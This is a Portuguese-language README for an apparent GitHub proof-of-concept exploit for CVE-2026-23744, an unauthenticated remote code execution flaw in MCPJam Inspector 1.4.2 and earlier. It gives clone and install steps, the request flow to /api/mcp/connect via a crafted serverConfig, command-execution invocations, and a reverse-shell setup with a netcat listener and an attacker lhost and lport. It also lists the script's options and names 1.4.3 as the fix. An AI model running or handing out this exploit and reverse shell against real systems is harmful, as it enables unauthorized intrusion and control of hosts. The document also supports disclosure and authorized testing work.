
Prova de conceito de execução remota de código não autenticada para CVE-2026-23744 direcionada ao MCPJam Inspector. Gera payloads MCP serverConfig elaborados para explorar o endpoint /api/mcp/connect com suporte a reverse shell e depuração em modo dry-run.
PoC de execução remota de código não autenticada para CVE-2026-23744. O MCPJam Inspector 1.4.2 e versões anteriores expõem funcionalidades por meio de /api/mcp/connect que podem iniciar um comando de servidor MCP controlado pelo atacante sem autenticação.
Apenas para testes autorizados e pesquisa. Não utilize contra sistemas que você não possui ou para os quais não tem permissão explícita de teste.
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
serverConfig elaborado./api/mcp/connect.bash -c.


git clone https://github.com/ozcanpng/CVE-2026-23744.git
cd CVE-2026-23744
pip install -r requirements.txt
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--cmd 'id'
Inicie um listener primeiro:
rlwrap nc -lvnp 4444
Em seguida, execute:
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--reverse-shell \
--lhost 10.10.16.53 \
--lport 4444
Opções úteis:
--cmd COMMAND Command to execute (default: id)
--server-id VALUE serverId value in the crafted MCP config (default: pwn)
--dry-run Build payload flow without sending the HTTP request
--debug Print endpoint and JSON payload
--verify-tls Verify HTTPS certificates
--timeout SECONDS HTTP timeout in seconds (default: 8)
--yes Skip reverse-shell confirmation prompt
| Produto | Versão afetada | Acesso necessário | Impacto |
|---|---|---|---|
| MCPJam Inspector | <= 1.4.2 | Nenhum | Execução remota de comandos como o usuário do processo do MCPJam Inspector |
O problema fica especialmente exposto quando o MCPJam Inspector escuta em 0.0.0.0, permitindo que hosts remotos alcancem o serviço de desenvolvimento.
/api/mcp/connect.serverConfig.command e serverConfig.args.--cmd para validação segura antes de tentar um reverse shell.--dry-run --debug para inspecionar a requisição gerada sem tocar em um alvo.1.4.3 contém o patch upstream de acordo com o NVD.ozcanpng — github.com/ozcanpng — ozcanpng.dev